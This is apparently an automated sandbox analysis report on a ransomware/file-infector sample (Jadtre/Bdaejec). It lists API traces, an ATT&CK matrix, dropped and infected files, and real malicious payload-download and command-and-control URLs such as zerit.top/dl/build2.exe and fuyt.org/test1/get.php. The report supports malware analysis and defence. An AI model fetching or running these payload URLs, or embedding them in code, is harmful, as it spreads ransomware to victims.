          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: GetLocaleInfoW,6_2_0043884E
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,6_2_00432B6D
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_00432FAD
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_004335E7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,6_2_00437BB3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: EnumSystemLocalesW,6_2_00437E27
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437E83
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437F00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,6_2_0042BF17
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,6_2_00437F83
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_02210AB6
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,9_2_021FC8B7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,9_2_0220394D
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,9_2_022049EA
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,9_2_02203F87
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_02350AB6
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,10_2_0233C8B7
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,10_2_0234394D
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,10_2_023449EA
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_02343F87
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004111F0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004111F0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,6_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_0042FE47
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00409030 VerLanguageNameW,SetDefaultCommConfigW,ReadConsoleOutputCharacterA,SetConsoleCursorInfo,GetVersionExA,DebugBreak,SetLastError,SetLastError,FreeResource,VerifyVersionInfoA,BuildCommDCBW,CopyFileExW,GetCompressedFileSizeA,FindNextFileA,SetEvent,FreeResource,VerifyVersionInfoA,GetVersionExA,SetLastError,TerminateProcess,CreateTimerQueueTimer,FillConsoleOutputCharacterA,0_2_00409030
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected Bdaejec
          Source: Yara matchFile source: Process Memory Space: HhVfIB.exe PID: 5968, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Bdaejec
          Source: Yara matchFile source: Process Memory Space: HhVfIB.exe PID: 5968, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Deobfuscate/Decode Files or Information          		OS Credential Dumping12
          System Time Discovery          		1
          Taint Shared Content          		11
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts3
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		3
          Obfuscated Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Screen Capture          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Services File Permissions Weakness          		1
          Access Token Manipulation          		21
          Software Packing          		Security Account Manager4
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive11
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
          Process Injection          		1
          DLL Side-Loading          		NTDS24
          System Information Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          Masquerading          		LSA Secrets1
          Query Registry          		SSHKeylogging113
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Services File Permissions Weakness          		21
          Virtualization/Sandbox Evasion          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync21
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
          Process Injection          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Services File Permissions Weakness          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482678 Sample: DE1BEC11380A046D35656CB592A... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 66 zerit.top 2->66 68 fuyt.org 2->68 70 2 other IPs or domains 2->70 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 14 other signatures 2->86 9 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 1 2->9         started        13 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 2->13         started        15 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 56 C:\Users\user\AppData\Local\Temp\HhVfIB.exe, MS-DOS 9->56 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Detected unpacking (overwrites its own PE header) 9->94 96 Writes a notice file (html or txt) to demand a ransom 9->96 102 2 other signatures 9->102 19 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 1 17 9->19         started        23 HhVfIB.exe 14 9->23         started        98 Multi AV Scanner detection for dropped file 13->98 100 Injects a PE file into a foreign processes 13->100 26 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 13->26         started        28 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 15->28         started        30 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 17->30         started        32 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 17->32         started        signatures6 process7 dnsIp8 72 api.2ip.ua 188.114.97.3, 443, 49702, 49704 CLOUDFLARENETUS European Union 19->72 46 DE1BEC11380A046D35...D5DAC3D0F61C55E.exe, PE32 19->46 dropped 48 DE1BEC11380A046D35...exe:Zone.Identifier, ASCII 19->48 dropped 34 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 19->34         started        37 icacls.exe 19->37         started        74 ddos.dnsnb8.net 44.221.84.105, 49703, 799 AMAZON-AESUS United States 23->74 50 C:\Program Files\7-Zip\Uninstall.exe, PE32 23->50 dropped 52 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 23->52 dropped 54 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 23->54 dropped 88 Detected unpacking (changes PE section rights) 23->88 90 Infects executable files (exe, dll, sys, html) 23->90 39 WerFault.exe 23->39         started        file9 signatures10 process11 signatures12 78 Injects a PE file into a foreign processes 34->78 41 DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe 21 34->41         started        process13 dnsIp14 76 zerit.top 92.246.89.93, 49705, 49706, 49713 LIVECOMM-ASRespublikanskayastr3k6RU Russian Federation 41->76 58 C:\_readme.txt, ASCII 41->58 dropped 60 C:\Users\user\_readme.txt, ASCII 41->60 dropped 62 C:\Users\user\...\wctDE6E.tmp.wdlo (copy), MS-DOS 41->62 dropped 64 116 other malicious files 41->64 dropped 104 Infects executable files (exe, dll, sys, html) 41->104 106 Modifies existing user documents (likely ransomware behavior) 41->106 file15 signatures16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe96%ReversingLabsWin32.Virus.Jadtre
          DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe100%AviraW32/Jadtre.B
          DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\tmpAAA2.tmp100%AviraW32/Jadtre.D
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
          C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
          C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe96%ReversingLabsWin32.Virus.Jadtre

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          http://www.openssl.org/support/faq.html0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
          http://www.youtube.com/0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudphishing
          https://api.2ip.ua/geo.json.0%Avira URL Cloudsafe
          http://www.amazon.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonOfX:0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonRoB0%Avira URL Cloudsafe
          https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P0%Avira URL Cloudsafe
          http://zerit.top/dl/build2.exe100%Avira URL Cloudphishing
          http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true100%Avira URL Cloudmalware
          https://api.2ip.ua/3c0%Avira URL Cloudsafe
          http://schemas.microsoftp0%Avira URL Cloudsafe
          https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac050%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json$0%Avira URL Cloudsafe
          http://zerit.top/dl/build2.exew0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsony_:0%Avira URL Cloudsafe
          https://we.tl/t-0S984cQ4B30%Avira URL Cloudsafe
          http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200100%Avira URL Cloudmalware
          http://www.twitter.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/M80%Avira URL Cloudsafe
          https://dc.services.visualstudio.com/v2/track0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonvr0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonNr?60%Avira URL Cloudsafe
          http://www.reddit.com/0%Avira URL Cloudsafe
          http://fuyt.org/files/1/build3.exe$runOm0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonrs0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsony0%Avira URL Cloudsafe
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200v100%Avira URL Cloudmalware
          https://M365CDN.nel.measure.office-920%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json(x86)J0%Avira URL Cloudsafe
          http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200x100%Avira URL Cloudmalware
          https://api.2ip.ua/geo.jsonp20%Avira URL Cloudsafe
          http://ocsp.digi0%Avira URL Cloudsafe
          http://fuyt.org/files/1/build3.exe$run0%Avira URL Cloudsafe
          https://www.office.com/0%Avira URL Cloudsafe
          http://www.nytimes.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.0%Avira URL Cloudsafe
          http://fuyt.org/files/1/build3.exe0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonP0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json6R0%Avira URL Cloudsafe
          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonn0%Avira URL Cloudsafe
          https://we.tl/t-0S984cQ4:p0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonj0%Avira URL Cloudsafe
          https://we.tl/t-0S984cQ40%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
          https://api.2ip.ua/9c0%Avira URL Cloudsafe
          https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c580%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rarH100%Avira URL Cloudphishing
          https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonpm0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonesW0%Avira URL Cloudsafe
          https://api.2ip.ua/u80%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rarPU100%Avira URL Cloudphishing
          https://api.2ip.ua/geo.json40%Avira URL Cloudsafe
          https://api.2ip.ua/geo.json70%Avira URL Cloudsafe
          http://zerit.top/dl/build2.exe$run0%Avira URL Cloudsafe
          http://fuyt.org/3C8DAB0A318E3BBE55D6418C454BF200N0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudphishing
          https://api.2ip.ua/geo.jsonat50%Avira URL Cloudsafe
          http://fuyt.org/files/1/build3.exe$runrueDm0%Avira URL Cloudsafe
          http://www.wikipedia.com/0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonI0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rarf100%Avira URL Cloudphishing
          http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF2005100%Avira URL Cloudmalware
          http://www.live.com/0%Avira URL Cloudsafe
          http://fuyt.org/test1/get.php100%Avira URL Cloudmalware
          https://api.2ip.ua/geo.jsonA0%Avira URL Cloudsafe
          https://api.2ip.ua/geo.jsonHM0%Avira URL Cloudsafe
          http://fuyt.org/test1/get.phpp0%Avira URL Cloudsafe
          http://www.google.com/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ddos.dnsnb8.net
          		44.221.84.105
          		truefalse
            		unknown
            fuyt.org
            		92.246.89.93
            		truetrue
              		unknown
              api.2ip.ua
              		188.114.97.3
              		truefalse
                		unknown
                zerit.top
                		92.246.89.93
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ddos.dnsnb8.net:799/cj//k1.rartrue
                  • URL Reputation: malware
                  		unknown
                  https://api.2ip.ua/geo.jsonfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fuyt.org/test1/get.phptrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PV0100004.log.12.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://zerit.top/dl/build2.exeDE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008F1000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
